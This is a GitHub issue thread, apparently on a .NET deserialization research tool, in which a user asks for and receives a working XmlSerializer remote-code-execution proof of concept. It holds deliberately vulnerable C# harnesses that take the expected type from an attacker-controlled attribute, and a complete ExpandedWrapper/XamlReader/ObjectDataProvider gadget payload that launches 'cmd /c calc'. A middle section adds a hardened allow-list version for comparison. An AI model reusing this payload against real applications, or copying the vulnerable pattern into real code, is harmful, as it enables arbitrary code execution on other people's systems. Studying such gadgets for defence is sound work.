Closed (vah13 closed this issue 5 years ago)
Hi,
For XmlSerializer to be vulnerable, the attacker needs to be able to control the expected type:
XmlSerializer xmlSerializer = new XmlSerializer(<attacker controllable>, "http://web.com/a");
Cheers, A
Hey, I am doing tests with Visual Studio and I haven't managed to create vulnerable XmlSerializer code from scratch. Please send me a simple vulnerable project or point me in the right direction; the one I am using is this one:

using System;
using System.IO;
using System.Windows.Forms;
using System.Xml.Serialization;

namespace WindowsFormsApplication3
{
    [XmlRoot]
    public class TestClass
    {
        public string classname;
        private string name;
        private int age;

        [XmlAttribute]
        public string Classname { get { return classname; } set { classname = value; } }

        [XmlElement]
        public string Name { get { return name; } set { name = value; } }

        [XmlElement]
        public int Age { get { return age; } set { age = value; } }

        public override string ToString() { return base.ToString(); }
    }

    class Program
    {
        static void Main(string[] args)
        {
            TestClass testClass = new TestClass();
            using (var stream = new FileStream(@"d:\1.xml", FileMode.Open))
            {
                // Expected type is hard-coded to TestClass here
                var serializers = new XmlSerializer(typeof(TestClass));
                testClass = serializers.Deserialize(stream) as TestClass;
            }
            MessageBox.Show(testClass.Name);
        }
    }
}

But I think that class doesn't meet the conditions; I would appreciate some help, thanks.
This is the payload I am using:
<?xml version="1.0" encoding="utf-8"?>
<ExpandedWrapperOfTestClassObjetDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="TestClass">
      <Age>0</Age>
    </ObjectInstance>
    <MethodName>ClassMethod</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string">calc.exe</anyType>
    </MethodParameters>
  </ProjectedProperty0>
</ExpandedWrapperOfTestClassObjetDataProvider>
Check slide 47 here: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
The attacker needs to be able to control the expected type, as DNN was doing here: https://github.com/dnnsoftware/Dnn.Platform/blob/a142594a0c18a589cb5fb913a022eebe34549a8f/DNN%20Platform/Library/Common/Utilities/XmlUtils.cs#L201
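As an added example (not code from this thread or from the project), the pattern described above, an expected type derived from an attacker-controlled string, beside a hardened version that only accepts a fixed allow-list of application types. The Item class, the allow-list, the root/type document layout and both sample documents are assumptions made for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

// Hypothetical application type used for illustration.
public class Item
{
    public string Name { get; set; }
    public int Quantity { get; set; }
}

public static class XmlDeserializer
{
    // VULNERABLE: the expected type is read from the document itself, so the
    // attacker can name a gadget type (e.g. the ExpandedWrapper`2 of XamlReader
    // and ObjectDataProvider discussed in this thread) and Type.GetType will
    // load it by assembly-qualified name. Kept only for comparison; never feed
    // it untrusted input.
    public static object DeserializeUnsafe(string xml)
    {
        var doc = new XmlDocument();
        doc.LoadXml(xml);
        string typeName = doc.DocumentElement.GetAttribute("type");
        var serializer = new XmlSerializer(Type.GetType(typeName)); // attacker-controlled type
        using (var reader = new XmlTextReader(new StringReader(doc.DocumentElement.InnerXml)))
        {
            return serializer.Deserialize(reader);
        }
    }

    // HARDENED: the "type" attribute is only a key into a fixed allow-list of
    // application types. Nothing outside that list ever reaches the
    // XmlSerializer constructor, and XmlSerializer itself can only create types
    // reachable from the statically declared graph of the expected type.
    private static readonly Dictionary<string, Type> AllowedTypes =
        new Dictionary<string, Type>(StringComparer.Ordinal)
        {
            { "Item", typeof(Item) },
        };

    public static object DeserializeSafe(string xml)
    {
        var doc = new XmlDocument { XmlResolver = null }; // no external entity resolution
        doc.LoadXml(xml);
        string typeName = doc.DocumentElement.GetAttribute("type");

        Type expected;
        if (!AllowedTypes.TryGetValue(typeName, out expected))
        {
            throw new InvalidOperationException("Rejected type name: " + typeName);
        }

        var serializer = new XmlSerializer(expected);
        // XmlReader.Create prohibits DTDs by default, unlike XmlTextReader.
        using (var reader = XmlReader.Create(new StringReader(doc.DocumentElement.InnerXml)))
        {
            return serializer.Deserialize(reader);
        }
    }

    public static void Main()
    {
        // Constructed benign document: the root carries the type key, the body
        // is the serialized Item.
        const string benign =
            "<root type=\"Item\"><Item><Name>apple</Name><Quantity>3</Quantity></Item></root>";
        var item = (Item)DeserializeSafe(benign);
        Console.WriteLine(item.Name + " x " + item.Quantity);

        // Constructed malicious document: the same gadget type name the thread's
        // miau.xml uses, with the body omitted. The allow-list rejects it before
        // any serializer exists.
        const string malicious =
            "<root type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, " +
            "PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]," +
            "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, " +
            "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, " +
            "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">" +
            "<ExpandedWrapperOfXamlReaderObjectDataProvider/></root>";
        try
        {
            DeserializeSafe(malicious);
        }
        catch (InvalidOperationException e)
        {
            Console.WriteLine("blocked: " + e.Message);
        }
    }
}
```

The allow-list entries should themselves be plain data classes: XmlSerializer with a fixed expected type can still instantiate anything statically reachable from that type (for instance through a member of type object with declared known types), so keeping gadget-bearing types out of the reachable graph is part of the fix, not just the name check.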
Hello Alvaro, thank you very much, but, if that's not too much to ask, could you please provide complete code I can use straight away, not parts of code? Thanks
This is my code now; if you tell me how to set up the "miau.xml" payload based on the code to test command execution, that would be epic. Thanks!!!

using System;
using System.Xml;
using System.Xml.Serialization;

namespace WindowsFormsApplication3
{
    class Program
    {
        static void Main(string[] args)
        {
            var xmlDoc = new XmlDocument();
            // LoadXml parses the string itself as XML; a file path needs xmlDoc.Load(path)
            xmlDoc.LoadXml("miau.xml");
            foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/item"))
            {
                // Expected type is taken from the document's "type" attribute
                string typeName = xmlItem.GetAttribute("type");
                var xser = new XmlSerializer(Type.GetType(typeName));
            }
        }
    }
}
Just make the argument to XmlSerializer take a type derived from a string controlled by the attacker. Check the new RCE found in SharePoint for another example:
Haven't tried it, but it should be something like:
using System;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

namespace WindowsFormsApplication3
{
    class Program
    {
        static void Main(string[] args)
        {
            var xmlDoc = new XmlDocument();
            // LoadXml parses the string itself as XML; a file path needs xmlDoc.Load(path)
            xmlDoc.LoadXml("miau.xml");
            foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root"))
            {
                // Expected type comes from the attacker-controlled "type" attribute
                string typeName = xmlItem.GetAttribute("type");
                var xser = new XmlSerializer(Type.GetType(typeName));
                // Deserialize the body of <root> with that type
                var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
                xser.Deserialize(reader);
            }
        }
    }
}
And then miau.xml should be the one you generated:
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider>
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd</System:String>
<System:String>/c calc</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
Thank you very much Alvaro for that code, it has really taken me quite a while to find a PoC like this that works well without needing 1000 classes and crap, so I appreciate it. The final code, with the imports and a small bug I had when loading the XML fixed, is this:

using System;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

namespace XMLDoc
{
    class Program
    {
        static void Main(string[] args)
        {
            var xmlDoc = new XmlDocument();
            // Load(path) reads the file; LoadXml(string) would parse the path text itself
            xmlDoc.Load(@"d:\miau.xml");
            foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root"))
            {
                // Expected type is taken from the attacker-supplied "type" attribute
                string typeName = xmlItem.GetAttribute("type");
                Console.WriteLine(typeName);
                var xser = new XmlSerializer(Type.GetType(typeName));
                // Deserialize the body of <root>; the ObjectDataProvider gadget runs here
                var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
                xser.Deserialize(reader);
            }
        }
    }
}
;)!
Hi there, I have this .NET code
I generated this XML PoC
During deserialization I'm getting this error
Could you help me? How can I fix it? Why am I getting this error?